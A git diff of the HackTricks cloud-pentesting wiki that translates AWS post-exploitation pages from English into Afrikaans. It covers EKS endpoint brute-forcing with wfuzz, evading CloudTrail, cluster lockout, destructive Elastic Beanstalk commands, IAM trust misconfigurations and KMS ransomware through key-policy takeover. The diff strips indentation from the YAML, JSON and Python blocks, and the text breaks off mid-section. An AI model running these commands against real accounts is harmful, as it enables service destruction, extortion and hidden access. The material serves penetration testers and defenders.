U01ZGdZc2c4SlpJY3I2WC8KRG5POGlHOGxmMXVxend1dUdHSHM2R1lNR0Mvd1V0czVvcm1GS291SmtSUWhBZElMVkNuaStYNCtmcHUzT21UNwprS3VmR0tyRVlKT09VL1c2YTB3OTRycU9iSS9Mem1GSWxJQnVNcXZWVDBwOGtlcTc1eklpdGNzaUJmYVVidng3Ci9sMGhvS1RqM0IrOGlwbktIWW4wNGZ1R2F2YVJRbEhWcldDVlZ4c3ZyYWpxOUdJNWJUUlJ6TnpTbzFlcTVZNisKRzVBPQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg==
-      server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com
-    name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
+- cluster:
+certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUMvakNDQWVhZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeU1USXlPREUyTWpjek1Wb1hEVE15TVRJeU5URTJNamN6TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTDlXCk9OS0ZqeXZoRUxDZGhMNnFwWkMwa1d0UURSRVF1UzVpRDcwK2pjbjFKWXZ4a3FsV1ZpbmtwOUt5N2x2ME5mUW8KYkNqREFLQWZmMEtlNlFUWVVvOC9jQXJ4K0RzWVlKV3dzcEZGbWlsY1lFWFZHMG5RV1VoMVQ3VWhOanc0MllMRQpkcVpzTGg4OTlzTXRLT1JtVE5sN1V6a05pTlUzSytueTZSRysvVzZmbFNYYnRiT2kwcXJSeFVpcDhMdWl4WGRVCnk4QTg3VjRjbllsMXo2MUt3NllIV3hhSm11eWI5enRtbCtBRHQ5RVhOUXhDMExrdWcxSDBqdTl1MDlkU09YYlkKMHJxY2lINjYvSTh0MjlPZ3JwNkY0dit5eUNJUjZFQURRaktHTFVEWUlVSkZ4WXA0Y1pGcVA1aVJteGJ5Nkh3UwpDSE52TWNJZFZRRUNQMlg5R2c4Q0F3RUFBYU5aTUZjd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZQVXFsekhWZmlDd0xqalhPRmJJUUc3L0VxZ1hNQlVHQTFVZEVRUU8KTUF5Q0NtdDFZbVZ5Ym1WMFpYTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBS1o4c0l4aXpsemx0aXRPcGcySgpYV0VUSThoeWxYNWx6cW1mV0dpZkdFVVduUDU3UEVtWW55eWJHbnZ5RlVDbnczTldMRTNrbEVMQVE4d0tLSG8rCnBZdXAzQlNYamdiWFovdWVJc2RhWlNucmVqNU1USlJ3SVFod250ZUtpU0J4MWFRVU01ZGdZc2c4SlpJY3I2WC8KRG5POGlHOGxmMXVxend1dUdHSHM2R1lNR0Mvd1V0czVvcm1GS291SmtSUWhBZElMVkNuaStYNCtmcHUzT21UNwprS3VmR0tyRVlKT09VL1c2YTB3OTRycU9iSS9Mem1GSWxJQnVNcXZWVDBwOGtlcTc1eklpdGNzaUJmYVVidng3Ci9sMGhvS1RqM0IrOGlwbktIWW4wNGZ1R2F2YVJRbEhWcldDVlZ4c3ZyYWpxOUdJNWJUUlJ6TnpTbzFlcTVZNisKRzVBPQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg==
+server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com
+name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
 contexts:
-  - context:
-      cluster: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
-      user: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
-    name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
+- context:
+cluster: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
+user: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
+name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
 current-context: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
 kind: Config
 preferences: {}
 users:
-  - name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
-    user:
-      exec:
-        apiVersion: client.authentication.k8s.io/v1beta1
-        args:
-          - --region
-          - us-west-2
-          - --profile
-          - <profile>
-          - eks
-          - get-token
-          - --cluster-name
-          - <cluster-name>
-        command: aws
-        env: null
-        interactiveMode: IfAvailable
-        provideClusterInfo: false
+- name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
+user:
+exec:
+apiVersion: client.authentication.k8s.io/v1beta1
+args:
+- --region
+- us-west-2
+- --profile
+- <profile>
+- eks
+- get-token
+- --cluster-name
+- <cluster-name>
+command: aws
+env: null
+interactiveMode: IfAvailable
+provideClusterInfo: false
 ```
-
 </details>
 
-### From AWS to Kubernetes
+### Van AWS na Kubernetes
 
-The **creator** of the **EKS cluster** is **ALWAYS** going to be able to get into the kubernetes cluster part of the group **`system:masters`** (k8s admin). At the time of this writing there is **no direct way** to find **who created** the cluster (you can check CloudTrail). And the is **no way** to **remove** that **privilege**.
+Die **skepper** van die **EKS-kluster** sal **ALTYD** in staat wees om in die kubernetes kluster deel van die groep **`system:masters`** (k8s admin) te kom. Ten tyde van hierdie skrywe is daar **geen direkte manier** om **te vind wie die kluster geskep het** (jy kan CloudTrail nagaan). En daar is **geen manier** om daardie **privilegie** te **verwyder**.
 
-The way to grant **access to over K8s to more AWS IAM users or roles** is using the **configmap** **`aws-auth`**.
+Die manier om **toegang tot K8s aan meer AWS IAM gebruikers of rolle** te verleen, is deur die **configmap** **`aws-auth`** te gebruik.
 
 > [!WARNING]
-> Therefore, anyone with **write access** over the config map **`aws-auth`** will be able to **compromise the whole cluster**.
+> Daarom sal enige iemand met **skryftoegang** oor die config map **`aws-auth`** in staat wees om die **hele kluster te kompromitteer**.
 
-For more information about how to **grant extra privileges to IAM roles & users** in the **same or different account** and how to **abuse** this to [**privesc check this page**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps).
+Vir meer inligting oor hoe om **bykomende privilegies aan IAM rolle & gebruikers** in die **dieselfde of verskillende rekening** te verleen en hoe om dit te **misbruik**, kyk na [**privesc kyk hierdie bladsy**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps).
 
-Check also[ **this awesome**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **post to learn how the authentication IAM -> Kubernetes work**.
+Kyk ook na[ **hierdie wonderlike**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **plasing om te leer hoe die authenticatie IAM -> Kubernetes werk**.
 
-### From Kubernetes to AWS
+### Van Kubernetes na AWS
 
-It's possible to allow an **OpenID authentication for kubernetes service account** to allow them to assume roles in AWS. Learn how [**this work in this page**](../../kubernetes-security/kubernetes-pivoting-to-clouds.md#workflow-of-iam-role-for-service-accounts-1).
+Dit is moontlik om 'n **OpenID-authenticatie vir kubernetes diensrekening** toe te laat om hulle in staat te stel om rolle in AWS aan te neem. Leer hoe [**dit werk op hierdie bladsy**](../../kubernetes-security/kubernetes-pivoting-to-clouds.md#workflow-of-iam-role-for-service-accounts-1).
 
-### GET Api Server Endpoint from a JWT Token
-
-Decoding the JWT token we get the cluster id & also the region. ![image](https://github.com/HackTricks-wiki/hacktricks-cloud/assets/87022719/0e47204a-eea5-4fcb-b702-36dc184a39e9) Knowing that the standard format for EKS url is
+### KRY Api Bediening Eindpunt van 'n JWT Token
 
+Deur die JWT-token te ontcijfer, kry ons die kluster-id & ook die streek. ![image](https://github.com/HackTricks-wiki/hacktricks-cloud/assets/87022719/0e47204a-eea5-4fcb-b702-36dc184a39e9) Weet dat die standaardformaat vir EKS-URL is
 ```bash
 https://<cluster-id>.<two-random-chars><number>.<region>.eks.amazonaws.com
 ```
-
-Didn't find any documentation that explain the criteria for the 'two chars' and the 'number'. But making some test on my behalf I see recurring these one:
+Nie enige dokumentasie gevind wat die kriteria vir die 'twee karakters' en die 'nommer' verduidelik nie. Maar deur 'n paar toetse namens myself te doen, sien ek dat hierdie eene herhaaldelik voorkom:
 
 - gr7
 - yl4
 
-Anyway are just 3 chars we can bruteforce them. Use the below script for generating the list
-
+In elk geval is dit net 3 karakters wat ons kan bruteforce. Gebruik die onderstaande skrip om die lys te genereer.
 ```python
 from itertools import product
 from string import ascii_lowercase
@@ -116,44 +107,37 @@ letter_combinations = product('abcdefghijklmnopqrstuvwxyz', repeat = 2)
 number_combinations = product('0123456789', repeat = 1)
 
 result = [
-	f'{''.join(comb[0])}{comb[1][0]}'
-	for comb in product(letter_combinations, number_combinations)
+f'{''.join(comb[0])}{comb[1][0]}'
+for comb in product(letter_combinations, number_combinations)
 ]
 
 with open('out.txt', 'w') as f:
-	f.write('\n'.join(result))
+f.write('\n'.join(result))
 ```
-
-Then with wfuzz
-
+Dan met wfuzz
 ```bash
 wfuzz -Z -z file,out.txt --hw 0 https://<cluster-id>.FUZZ.<region>.eks.amazonaws.com
 ```
-
 > [!WARNING]
-> Remember to replace & .
+> Onthou om & te vervang.
 
 ### Bypass CloudTrail
 
-If an attacker obtains credentials of an AWS with **permission over an EKS**. If the attacker configures it's own **`kubeconfig`** (without calling **`update-kubeconfig`**) as explained previously, the **`get-token`** doesn't generate logs in Cloudtrail because it doesn't interact with the AWS API (it just creates the token locally).
+As 'n aanvaller die akrediteer van 'n AWS met **toestemming oor 'n EKS** verkry. As die aanvaller sy eie **`kubeconfig`** (sonder om **`update-kubeconfig`** te noem) soos voorheen verduidelik, genereer die **`get-token`** nie logs in Cloudtrail nie omdat dit nie met die AWS API interaksie het nie (dit skep net die token plaaslik).
 
-So when the attacker talks with the EKS cluster, **cloudtrail won't log anything related to the user being stolen and accessing it**.
+So wanneer die aanvaller met die EKS-kluster praat, **sal cloudtrail niks log wat verband hou met die gebruiker wat gesteel is en toegang verkry nie**.
 
-Note that the **EKS cluster might have logs enabled** that will log this access (although, by default, they are disabled).
+Let daarop dat die **EKS-kluster dalk logs geaktiveer het** wat hierdie toegang sal log (alhoewel dit standaard gedeaktiveer is).
 
 ### EKS Ransom?
 
-By default the **user or role that created** a cluster is **ALWAYS going to have admin privileges** over the cluster. And that the only "secure" access AWS will have over the Kubernetes cluster.
+Standaard het die **gebruiker of rol wat 'n kluster geskep het** **ALTYD administratiewe regte** oor die kluster. En dit is die enigste "veilige" toegang wat AWS oor die Kubernetes-kluster sal hê.
 
-So, if an **attacker compromises a cluster using fargate** and **removes all the other admins** and d**eletes the AWS user/role that created** the Cluster, ~~the attacker could have **ransomed the cluste**~~**r**.
+So, as 'n **aanvaller 'n kluster met fargate kompromitteer** en **alle ander admins verwyder** en **die AWS gebruiker/rol wat die Kluster geskep het verwyder**, ~~kan die aanvaller die **kluster geënkripteer het**~~**r**.
 
 > [!TIP]
-> Note that if the cluster was using **EC2 VMs**, it could be possible to get Admin privileges from the **Node** and recover the cluster.
+> Let daarop dat as die kluster **EC2 VMs** gebruik, dit moontlik kan wees om Admin regte van die **Node** te verkry en die kluster te herstel.
 >
-> Actually, If the cluster is using Fargate you could EC2 nodes or move everything to EC2 to the cluster and recover it accessing the tokens in the node.
+> Trouens, as die kluster Fargate gebruik, kan jy EC2 nodes of alles na EC2 na die kluster skuif en dit herstel deur toegang tot die tokens in die node te verkry.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
index 6267ee02f..4c7810928 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## Elastic Beanstalk
 
-For more information:
+Vir meer inligting:
 
 {{#ref}}
 ../aws-services/aws-elastic-beanstalk-enum.md
@@ -13,72 +13,58 @@ For more information:
 ### `elasticbeanstalk:DeleteApplicationVersion`
 
 > [!NOTE]
-> TODO: Test if more permissions are required for this
-
-An attacker with the permission `elasticbeanstalk:DeleteApplicationVersion` can **delete an existing application version**. This action could disrupt application deployment pipelines or cause loss of specific application versions if not backed up.
+> TODO: Toets of meer toestemmings benodig word hiervoor
 
+'n Aanvaller met die toestemming `elasticbeanstalk:DeleteApplicationVersion` kan **'n bestaande toepassingsweergawe verwyder**. Hierdie aksie kan toepassingsontplooiing pyplyne ontwrig of die verlies van spesifieke toepassingsweergawes veroorsaak as dit nie geback-up is nie.
 ```bash
 aws elasticbeanstalk delete-application-version --application-name my-app --version-label my-version
 ```
-
-**Potential Impact**: Disruption of application deployment and potential loss of application versions.
+**Potensiële Impak**: Ontwrichting van toepassingsontplooiing en potensiële verlies van toepassingsweergawe.
 
 ### `elasticbeanstalk:TerminateEnvironment`
 
 > [!NOTE]
-> TODO: Test if more permissions are required for this
-
-An attacker with the permission `elasticbeanstalk:TerminateEnvironment` can **terminate an existing Elastic Beanstalk environment**, causing downtime for the application and potential data loss if the environment is not configured for backups.
+> TODO: Toets of meer toestemmings benodig word vir dit
 
+'n Aanvaller met die toestemming `elasticbeanstalk:TerminateEnvironment` kan **'n bestaande Elastic Beanstalk-omgewing beëindig**, wat stilstand van die toepassing en potensiële dataverlies kan veroorsaak as die omgewing nie vir rugsteun geconfigureer is nie.
 ```bash
 aws elasticbeanstalk terminate-environment --environment-name my-existing-env
 ```
-
-**Potential Impact**: Downtime of the application, potential data loss, and disruption of services.
+**Potensiële Impak**: Stilstand van die toepassing, potensiële dataverlies, en ontwrigting van dienste.
 
 ### `elasticbeanstalk:DeleteApplication`
 
 > [!NOTE]
-> TODO: Test if more permissions are required for this
-
-An attacker with the permission `elasticbeanstalk:DeleteApplication` can **delete an entire Elastic Beanstalk application**, including all its versions and environments. This action could cause a significant loss of application resources and configurations if not backed up.
+> TODO: Toets of meer toestemmings benodig word hiervoor
 
+'n Aanvaller met die toestemming `elasticbeanstalk:DeleteApplication` kan **'n hele Elastic Beanstalk-toepassing verwyder**, insluitend al sy weergawes en omgewings. Hierdie aksie kan 'n beduidende verlies aan toepassingshulpbronne en konfigurasies veroorsaak as dit nie geback-up is nie.
 ```bash
 aws elasticbeanstalk delete-application --application-name my-app --terminate-env-by-force
 ```
-
-**Potential Impact**: Loss of application resources, configurations, environments, and application versions, leading to service disruption and potential data loss.
+**Potensiële Impak**: Verlies van toepassingshulpbronne, konfigurasies, omgewings en toepassingsweergawe, wat kan lei tot diensonderbreking en potensiële dataverlies.
 
 ### `elasticbeanstalk:SwapEnvironmentCNAMEs`
 
 > [!NOTE]
-> TODO: Test if more permissions are required for this
-
-An attacker with the `elasticbeanstalk:SwapEnvironmentCNAMEs` permission can **swap the CNAME records of two Elastic Beanstalk environments**, which might cause the wrong version of the application to be served to users or lead to unintended behavior.
+> TODO: Toets of meer toestemmings benodig word vir dit
 
+'n Aanvaller met die `elasticbeanstalk:SwapEnvironmentCNAMEs` toestemming kan **die CNAME-rekords van twee Elastic Beanstalk omgewings omruil**, wat mag veroorsaak dat die verkeerde weergawe van die toepassing aan gebruikers bedien word of lei tot onbedoelde gedrag.
 ```bash
 aws elasticbeanstalk swap-environment-cnames --source-environment-name my-env-1 --destination-environment-name my-env-2
 ```
-
-**Potential Impact**: Serving the wrong version of the application to users or causing unintended behavior in the application due to swapped environments.
+**Potensiële Impak**: Om die verkeerde weergawe van die toepassing aan gebruikers te dien of om onbedoelde gedrag in die toepassing te veroorsaak as gevolg van gewisselde omgewings.
 
 ### `elasticbeanstalk:AddTags`, `elasticbeanstalk:RemoveTags`
 
 > [!NOTE]
-> TODO: Test if more permissions are required for this
-
-An attacker with the `elasticbeanstalk:AddTags` and `elasticbeanstalk:RemoveTags` permissions can **add or remove tags on Elastic Beanstalk resources**. This action could lead to incorrect resource allocation, billing, or resource management.
+> TODO: Toets of meer toestemmings benodig word vir dit
 
+'n Aanvaller met die `elasticbeanstalk:AddTags` en `elasticbeanstalk:RemoveTags` toestemmings kan **tags op Elastic Beanstalk hulpbronne byvoeg of verwyder**. Hierdie aksie kan lei tot verkeerde hulpbron toewysing, fakturering, of hulpbron bestuur.
 ```bash
 aws elasticbeanstalk add-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tags Key=MaliciousTag,Value=1
 
 aws elasticbeanstalk remove-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tag-keys MaliciousTag
 ```
-
-**Potential Impact**: Incorrect resource allocation, billing, or resource management due to added or removed tags.
+**Potensiële Impak**: Onkorrekte hulpbron toewysing, fakturering, of hulpbron bestuur as gevolg van bygevoegde of verwyderde etikette.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md
index f734122e8..9f08ea283 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md
@@ -4,104 +4,90 @@
 
 ## IAM
 
-For more information about IAM access:
+Vir meer inligting oor IAM-toegang:
 
 {{#ref}}
 ../aws-services/aws-iam-enum.md
 {{#endref}}
 
-## Confused Deputy Problem
+## Verwarde Adjunk Probleem
 
-If you **allow an external account (A)** to access a **role** in your account, you will probably have **0 visibility** on **who can exactly access that external account**. This is a problem, because if another external account (B) can access the external account (A) it's possible that **B will also be able to access your account**.
+As jy **'n eksterne rekening (A)** toelaat om toegang te verkry tot 'n **rol** in jou rekening, sal jy waarskynlik **0 sigbaarheid** hê oor **wie presies toegang tot daardie eksterne rekening kan verkry**. Dit is 'n probleem, want as 'n ander eksterne rekening (B) toegang kan verkry tot die eksterne rekening (A), is dit moontlik dat **B ook toegang tot jou rekening sal hê**.
 
-Therefore, when allowing an external account to access a role in your account it's possible to specify an `ExternalId`. This is a "secret" string that the external account (A) **need to specify** in order to **assume the role in your organization**. As the **external account B won't know this string**, even if he has access over A he **won't be able to access your role**.
+Daarom, wanneer jy 'n eksterne rekening toelaat om toegang te verkry tot 'n rol in jou rekening, is dit moontlik om 'n `ExternalId` te spesifiseer. Dit is 'n "geheime" string wat die eksterne rekening (A) **moet spesifiseer** om **die rol in jou organisasie aan te neem**. Aangesien die **eksterne rekening B nie van hierdie string weet nie**, selfs al het hy toegang tot A, sal hy **nie in staat wees om jou rol te benader nie**.
 
 <figure><img src="../../../images/image (95).png" alt=""><figcaption></figcaption></figure>
 
-However, note that this `ExternalId` "secret" is **not a secret**, anyone that can **read the IAM assume role policy will be able to see it**. But as long as the external account A knows it, but the external account **B doesn't know it**, it **prevents B abusing A to access your role**.
-
-Example:
+Let egter daarop dat hierdie `ExternalId` "geheime" **nie 'n geheim is nie**, enigeen wat die **IAM aanneem rol beleid kan lees, sal dit kan sien**. Maar solank die eksterne rekening A dit weet, maar die eksterne rekening **B dit nie weet nie**, **verhoed dit dat B A misbruik om toegang tot jou rol te verkry**.
 
+Voorbeeld:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": {
-    "Effect": "Allow",
-    "Principal": {
-      "AWS": "Example Corp's AWS Account ID"
-    },
-    "Action": "sts:AssumeRole",
-    "Condition": {
-      "StringEquals": {
-        "sts:ExternalId": "12345"
-      }
-    }
-  }
+"Version": "2012-10-17",
+"Statement": {
+"Effect": "Allow",
+"Principal": {
+"AWS": "Example Corp's AWS Account ID"
+},
+"Action": "sts:AssumeRole",
+"Condition": {
+"StringEquals": {
+"sts:ExternalId": "12345"
+}
+}
+}
 }
 ```
-
 > [!WARNING]
-> For an attacker to exploit a confused deputy he will need to find somehow if principals of the current account can impersonate roles in other accounts.
+> Vir 'n aanvaller om 'n verwarde plaasvervanger te benut, sal hy op een of ander manier moet uitvind of die principals van die huidige rekening rolle in ander rekeninge kan naboots.
 
-### Unexpected Trusts
+### Onverwagte Vertroue
 
 #### Wildcard as principal
-
 ```json
 {
-  "Action": "sts:AssumeRole",
-  "Effect": "Allow",
-  "Principal": { "AWS": "*" }
+"Action": "sts:AssumeRole",
+"Effect": "Allow",
+"Principal": { "AWS": "*" }
 }
 ```
+Hierdie beleid **laat alle AWS** toe om die rol aan te neem.
 
-This policy **allows all AWS** to assume the role.
-
-#### Service as principal
-
+#### Diens as hoof
 ```json
 {
-  "Action": "lambda:InvokeFunction",
-  "Effect": "Allow",
-  "Principal": { "Service": "apigateway.amazonaws.com" },
-  "Resource": "arn:aws:lambda:000000000000:function:foo"
+"Action": "lambda:InvokeFunction",
+"Effect": "Allow",
+"Principal": { "Service": "apigateway.amazonaws.com" },
+"Resource": "arn:aws:lambda:000000000000:function:foo"
 }
 ```
+Hierdie beleid **toelaat enige rekening** om hul apigateway te konfigureer om hierdie Lambda aan te roep.
 
-This policy **allows any account** to configure their apigateway to call this Lambda.
-
-#### S3 as principal
-
+#### S3 as hoofpersoon
 ```json
 "Condition": {
 "ArnLike": { "aws:SourceArn": "arn:aws:s3:::source-bucket" },
-    "StringEquals": {
-        "aws:SourceAccount": "123456789012"
-    }
+"StringEquals": {
+"aws:SourceAccount": "123456789012"
+}
 }
 ```
+As 'n S3-emmer as 'n hoofpersoon gegee word, omdat S3-emmers nie 'n rekening-ID het nie, as jy **jou emmer verwyder het en die aanvaller dit in hul eie rekening geskep het**, kan hulle dit misbruik.
 
-If an S3 bucket is given as a principal, because S3 buckets do not have an Account ID, if you **deleted your bucket and the attacker created** it in their own account, then they could abuse this.
-
-#### Not supported
-
+#### Nie ondersteun nie
 ```json
 {
-  "Effect": "Allow",
-  "Principal": { "Service": "cloudtrail.amazonaws.com" },
-  "Action": "s3:PutObject",
-  "Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*"
+"Effect": "Allow",
+"Principal": { "Service": "cloudtrail.amazonaws.com" },
+"Action": "s3:PutObject",
+"Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*"
 }
 ```
-
-A common way to avoid Confused Deputy problems is the use of a condition with `AWS:SourceArn` to check the origin ARN. However, **some services might not support that** (like CloudTrail according to some sources).
+'n Algemene manier om Confused Deputy probleme te vermy, is die gebruik van 'n voorwaarde met `AWS:SourceArn` om die oorsprong ARN te kontroleer. egter, **sommige dienste mag dit nie ondersteun nie** (soos CloudTrail volgens sommige bronne).
 
 ## References
 
 - [https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md
index 482af5425..45718b74f 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md
@@ -4,134 +4,122 @@
 
 ## KMS
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-kms-enum.md
 {{#endref}}
 
-### Encrypt/Decrypt information
+### Enkripteer/Deenkripteer inligting
 
-`fileb://` and `file://` are URI schemes used in AWS CLI commands to specify the path to local files:
+`fileb://` en `file://` is URI skemas wat in AWS CLI opdragte gebruik word om die pad na plaaslike lêers te spesifiseer:
 
-- `fileb://:` Reads the file in binary mode, commonly used for non-text files.
-- `file://:` Reads the file in text mode, typically used for plain text files, scripts, or JSON that doesn't have special encoding requirements.
+- `fileb://:` Lees die lêer in binêre modus, algemeen gebruik vir nie-teks lêers.
+- `file://:` Lees die lêer in teksmodus, tipies gebruik vir gewone teks lêers, skripte, of JSON wat nie spesiale kodering vereistes het nie.
 
 > [!TIP]
-> Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64 encoded data. (fileb://)
-
-- Using a **symmetric** key
+> Let daarop dat as jy sekere data binne 'n lêer wil deenkripteer, die lêer die binêre data moet bevat, nie base64 gekodeerde data nie. (fileb://)
 
+- Gebruik 'n **simmetriese** sleutel
 ```bash
 # Encrypt data
 aws kms encrypt \
-    --key-id f0d3d719-b054-49ec-b515-4095b4777049 \
-    --plaintext fileb:///tmp/hello.txt \
-    --output text \
-    --query CiphertextBlob | base64 \
-    --decode > ExampleEncryptedFile
+--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
+--plaintext fileb:///tmp/hello.txt \
+--output text \
+--query CiphertextBlob | base64 \
+--decode > ExampleEncryptedFile
 
 # Decrypt data
 aws kms decrypt \
-    --ciphertext-blob fileb://ExampleEncryptedFile \
-    --key-id f0d3d719-b054-49ec-b515-4095b4777049 \
-    --output text \
-    --query Plaintext | base64 \
-    --decode
+--ciphertext-blob fileb://ExampleEncryptedFile \
+--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
+--output text \
+--query Plaintext | base64 \
+--decode
 ```
-
-- Using a **asymmetric** key:
-
+- Gebruik van 'n **asimetiese** sleutel:
 ```bash
 # Encrypt data
 aws kms encrypt \
-    --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
-    --encryption-algorithm RSAES_OAEP_SHA_256 \
-    --plaintext fileb:///tmp/hello.txt \
-    --output text \
-    --query CiphertextBlob | base64 \
-    --decode > ExampleEncryptedFile
+--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
+--encryption-algorithm RSAES_OAEP_SHA_256 \
+--plaintext fileb:///tmp/hello.txt \
+--output text \
+--query CiphertextBlob | base64 \
+--decode > ExampleEncryptedFile
 
 # Decrypt data
 aws kms decrypt \
-    --ciphertext-blob fileb://ExampleEncryptedFile \
-    --encryption-algorithm RSAES_OAEP_SHA_256 \
-    --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
-    --output text \
-    --query Plaintext | base64 \
-    --decode
+--ciphertext-blob fileb://ExampleEncryptedFile \
+--encryption-algorithm RSAES_OAEP_SHA_256 \
+--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
+--output text \
+--query Plaintext | base64 \
+--decode
 ```
-
 ### KMS Ransomware
 
-An attacker with privileged access over KMS could modify the KMS policy of keys and **grant his account access over them**, removing the access granted to the legit account.
+'n Aanvaller met bevoorregte toegang oor KMS kan die KMS-beleid van sleutels wysig en **sy rekening toegang oor hulle verleen**, terwyl die toegang wat aan die regte rekening gegee is, verwyder word.
 
-Then, the legit account users won't be able to access any informatcion of any service that has been encrypted with those keys, creating an easy but effective ransomware over the account.
+Dan sal die regte rekeninggebruikers nie in staat wees om enige inligting van enige diens wat met daardie sleutels versleuteld is, te bekom nie, wat 'n maklike maar effektiewe ransomware oor die rekening skep.
 
 > [!WARNING]
-> Note that **AWS managed keys aren't affected** by this attack, only **Customer managed keys**.
-
-> Also note the need to use the param **`--bypass-policy-lockout-safety-check`** (the lack of this option in the web console makes this attack only possible from the CLI).
+> Let daarop dat **AWS bestuurde sleutels nie deur hierdie aanval geraak word** nie, slegs **Kliënt bestuurde sleutels**.
 
+> Let ook op die behoefte om die parameter **`--bypass-policy-lockout-safety-check`** te gebruik (die gebrek aan hierdie opsie in die webkonsol maak hierdie aanval slegs moontlik vanaf die CLI).
 ```bash
 # Force policy change
 aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
-    --policy-name default \
-    --policy file:///tmp/policy.yaml \
-    --bypass-policy-lockout-safety-check
+--policy-name default \
+--policy file:///tmp/policy.yaml \
+--bypass-policy-lockout-safety-check
 
 {
-    "Id": "key-consolepolicy-3",
-    "Version": "2012-10-17",
-    "Statement": [
-        {
-            "Sid": "Enable IAM User Permissions",
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "arn:aws:iam::<your_own_account>:root"
-            },
-            "Action": "kms:*",
-            "Resource": "*"
-        }
-    ]
+"Id": "key-consolepolicy-3",
+"Version": "2012-10-17",
+"Statement": [
+{
+"Sid": "Enable IAM User Permissions",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::<your_own_account>:root"
+},
+"Action": "kms:*",
+"Resource": "*"
+}
+]
 }
 ```
-
 > [!CAUTION]
-> Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**.
+> Let daarop dat as jy daardie beleid verander en slegs toegang aan 'n eksterne rekening gee, en dan van hierdie eksterne rekening probeer om 'n nuwe beleid in te stel om **die toegang terug te gee aan die oorspronklike rekening, jy nie in staat sal wees**.
 
 <figure><img src="../../../images/image (77).png" alt=""><figcaption></figcaption></figure>
 
-### Generic KMS Ransomware
+### Generiese KMS Ransomware
 
-#### Global KMS Ransomware
+#### Globale KMS Ransomware
 
-There is another way to perform a global KMS Ransomware, which would involve the following steps:
+Daar is 'n ander manier om 'n globale KMS Ransomware uit te voer, wat die volgende stappe sou behels:
 
-- Create a new **key with a key material** imported by the attacker
-- **Re-encrypt older data** encrypted with the previous version with the new one.
-- **Delete the KMS key**
-- Now only the attacker, who has the original key material could be able to decrypt the encrypted data
-
-### Destroy keys
